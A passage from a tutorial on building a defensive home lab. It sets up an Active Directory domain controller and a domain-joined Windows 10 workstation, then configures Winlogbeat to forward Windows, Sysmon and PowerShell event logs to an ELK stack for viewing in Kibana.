Save the file (ctrl+O, Enter, ctrl+x)

And start the services

sudo service logstash start
sudo service elasticsearch start
sudo service kibana start

Now if you browse to your Debian machine’s IP on port 5601 you should see Kibana.
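If the page doesn't load, a quick reachability check from another machine on the LAN helps narrow things down. This is just a sketch; 192.168.1.50 is a made-up placeholder for your Debian VM's address:

```shell
# Placeholder address: substitute the IP reported by `ip addr` on the ELK VM.
ELK_IP=192.168.1.50
# Elasticsearch should answer on 9200 with cluster info in JSON.
curl -s --connect-timeout 3 "http://${ELK_IP}:9200" || echo "Elasticsearch not reachable"
# Kibana serves its UI on 5601; print just the HTTP status code.
curl -s --connect-timeout 3 -o /dev/null -w '%{http_code}\n' "http://${ELK_IP}:5601" || echo "Kibana not reachable"
```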

ip addr
Figure 4: Viewing the host’s IP
Figure 5: Kibana/Elastic homepage

Windows Setup

Once again, I will not be showing how to deploy a VM, as I want this post to be platform agnostic. This section assumes you have already stood up a Windows Server 2019 machine and a Windows 10 machine.

In this section we will create an Active Directory lab by making a Domain Controller and Workstation.

Windows Server 2019

Once Server 2019 is stood up, the first thing you should do is set a static IP. If you don't, the machine's IP can change, which will break the environment. For reference, these are my settings.

Figure 6: Server’s IP settings

The important part here is setting the DNS servers. The preferred DNS server will be localhost (127.0.0.1), as we will install the DNS role on this machine in a moment. Then set Google's DNS server as the alternate so the server can reach the internet (optional; it's completely OK if you do not want your lab to reach the internet).

Next, rename the server to something more conventional. I named mine PRIMARY as it will act as the primary domain controller in the environment.

Figure 7: Go to Start>Type in “rename” and this is the screen that will be brought up
Figure 8: Renaming the server to PRIMARY

Reboot the server for the new settings to take effect. Once rebooted, you should see the Server Manager dashboard. Click on 'Add roles and features'

Figure 9: Server Manager Dashboard

Click next until you get to 'Server Roles'. Add DNS Server and Active Directory Domain Services

Figure 10: Adding DNS and ADDS services

Click next until it asks for confirmation, then click install.

Figure 11: Installing features

After it installs, the server dashboard will have a notification. Click on it and click ‘Promote this server to a domain controller’

Figure 12: Promote the machine to a DC

Once you click promote, it will bring up another window. Click ‘Add a new forest’ and give the domain a name. I named mine ‘LAB.LOCAL’

Figure 13: Give your domain a name

Next, leave the default functional levels (unless you're adding a 2012, 2008, or 2003 server, in which case change them accordingly). Then set the DSRM (Directory Services Restore Mode) password to something you'll remember.

Figure 14: Setting the DSRM password

Click next until you get to the prerequisite check, then click ‘install’.

Figure 15: Prereq check will give warnings

Once done, reboot the server.

Once rebooted, in the Server Dashboard, click on Tools>ADUC (Active Directory Users and Computers)

Figure 16: Tools>ADUC

ADUC is used to manage users, groups, and computers (among other things). In this instance we just want to create a new user and add them to the Domain Admins group.

In ADUC, click on your domain on the left then select ‘Users’. At the top, click the icon shown below to create a new user.

Figure 17: Creating a new user in ADUC

Give the account a name that identifies it as an administrator. Commonly, environments use ADM, ADMIN, -A, or some other moniker to signify a privileged account. Once created, right-click that user in ADUC and click 'Add to a group'

Figure 18: Adding the user to a group

Then type in ‘Domain Admins’ and select ‘OK’.

Figure 19: Adding the user to the Domain Admins group

Once the user is added to the Domain Admins group, switch over to the Windows 10 workstation. Once again, I will assume the provisioning of the machine was already done and it is able to communicate with the domain controller. A simple test is to ping the Domain Controller’s IP and ensure they can talk to each other on the network.

On the Windows 10 machine, edit the DNS settings to include your Domain Controller's IP address. An example is shown below.

Figure 20: Networking settings for Windows 10

Click on the Windows icon, type in ‘join domain’ and open up ‘Access work or school’. Click on the ‘Connect’ button and then click ‘join this device to a local Active Directory domain’.

Figure 21: Select the highlighted box

Enter the FQDN (Fully qualified domain name) of your domain and click ‘next’.

Figure 22: Enter the FQDN of your domain.

Note: If you get an error saying the domain was unable to be found, double check your DNS settings and ensure the Windows 10 machine can reach the Domain Controller.

You will then be prompted for credentials. This is where you will input your newly created Domain Administrator’s credentials.

Figure 23: Enter your DA’s credentials to join the domain

Reboot the PC and it will then be joined to the domain.

Winlogbeat

Now that we have a workstation and a domain controller, as well as an ELK server, we need to configure the two Windows machines to send their logs to the ELK server. To do this, we need a program called 'Winlogbeat'. In addition, I recommend also installing Sysmon. Download the Winlogbeat .zip file and unzip it to a folder on each of the Windows machines. Open a PowerShell window and navigate to the Winlogbeat directory. Run the following command

Set-ExecutionPolicy bypass

Select [a] when prompted

Then run the script

 .\install-service-winlogbeat.ps1
Figure 24: Installing Winlogbeat

Next, open "winlogbeat.yml" in Notepad. Replace its contents with the following, changing the "hosts" and "setup.kibana" entries to match your ELK server's IP.

# ======================= Winlogbeat specific options ==========================
winlogbeat.event_logs:
  - name: Application
    ignore_older: 30m
  - name: Security
    ignore_older: 30m
  - name: System
    ignore_older: 30m
  - name: Microsoft-Windows-Sysmon/Operational
    ignore_older: 30m
  - name: Microsoft-Windows-PowerShell/Operational
    event_id: 4103, 4104
    ignore_older: 30m
  - name: Windows PowerShell
    event_id: 400, 600
    ignore_older: 30m
  - name: Microsoft-Windows-WMI-Activity/Operational
    event_id: 5857, 5858, 5859, 5860, 5861

output.elasticsearch:
  hosts: ["ELKIPHERE:9200"]
  username: "elastic"
  password: "changeme"

setup.kibana:
  host: "ELKIPHERE"

Then start the winlogbeat service

Start-Service winlogbeat
Figure 25: Starting winlogbeat

Once the service is started, you can verify the connection and load the Elasticsearch index template and Kibana dashboards by running

.\winlogbeat setup -e
Figure 26: Checking winlogbeat config file

Back in Kibana, open the menu on the side and, under 'Analytics', go to 'Discover'. You should now see Windows logs.

Figure 28: Viewing Windows Logs

Ensure that time is synchronized across your lab, as the hosts' timestamps are what the logs reflect in Kibana. Otherwise, set your time filter to a wider range.

Your basic detection lab is now ready to go! As mentioned earlier, I recommend installing Sysmon on the Windows hosts to get more detailed events out of them.